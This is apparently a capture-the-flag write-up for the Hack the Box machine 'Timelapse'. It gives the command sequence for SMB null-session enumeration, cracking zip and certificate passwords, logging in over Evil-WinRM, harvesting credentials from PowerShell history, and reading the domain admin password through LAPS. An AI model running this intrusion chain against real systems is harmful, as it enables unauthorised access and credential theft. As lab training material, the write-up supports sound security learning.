Hack the Box: Timelapse

Enumeration

Nmap

The Nmap scan shows among other things that TCP ports 53 (DNS), 88 (Kerberos), 445 (SMB), and 5986 (WinRM with SSL) are open on the target. Target is part of an Active Directory domain called timelapse.htb; the computer name is DC01.

sudo nmap -sVC -Pn -p- 10.10.11.152

SMB

With Smbclient we were able to list the available shares using null login.

smbclient -L 10.10.11.152 -N

We were able to access a share called Shares. There we can see two folders: Dev and HelpDesk.

From the directory Dev, downloaded a zip file called winrm_backup.zip to the attacking machine.

cd Dev
get winrm_backup.zip

Unzipping the file winrm_backup.zip required a password.

Successfully cracked the password (supremelegacy) of the zip file with fcrackzip. After unzipping the file we can see a pfx file legacyy_dev_auth.pfx. Importing the certificate from the pfx file required another password, which wasn’t the password supremelegacy

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt winrm_backup.zip
unzip winrm_backup.zip

Converted the pfx file to hash format utilizing pfx2john and then used John the Ripper to crack the hash.

pfx2john legacyy_dev_auth.pfx > hash
john -w=/usr/share/wordlists/rockyou.txt hash

Used the cracked password thuglegacy to extract the SSL certificate using OpenSSL.

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem -nodes
openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem

Foothold

Since the target has port 5986 (WinRM) open, we can utilize Evil-WinRM with the -c and -k flags to pass the certificate and the key and authenticate to the target. We also add the -S flag to enable SSL. Successfully gained access as a user legacyy.

evil-winrm -i 10.10.11.152 -c cert.pem -k key.pem -S

Checking the command line history we can see new credentials: svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV

type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Utilizing those new credentials we were able to log in as user svc_deploy.

evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

The user flag can be obtained from the directory C:\Users\legacyy\Desktop.

Privilege Escalation

The user svc_deploy belongs to a group called LAPS_Readers, so we can make an assumption that the Active Directory domain uses Local Administrator Password Solution (LAPS).

net user svc_deploy

Checking the local group “administrators”, we can see an admin account called Administrator.

Double checked the computer name with the PowerShell command $env:COMPUTERNAME and then obtained the LAPS password with the command:

Get-ADComputer -Identity DC01 -Properties ms-Mcs-AdmPwd | Select-Object -ExpandProperty ms-Mcs-AdmPwd

Successfully logged in as user administrator utilizing Evil-WinRM

evil-winrm -i 10.10.11.152 -u administrator -p '1%zO#25D/4gfe/.[k0h![o%5' -S

The root flag can be obtained from the directory C:\Users\TRX\Desktop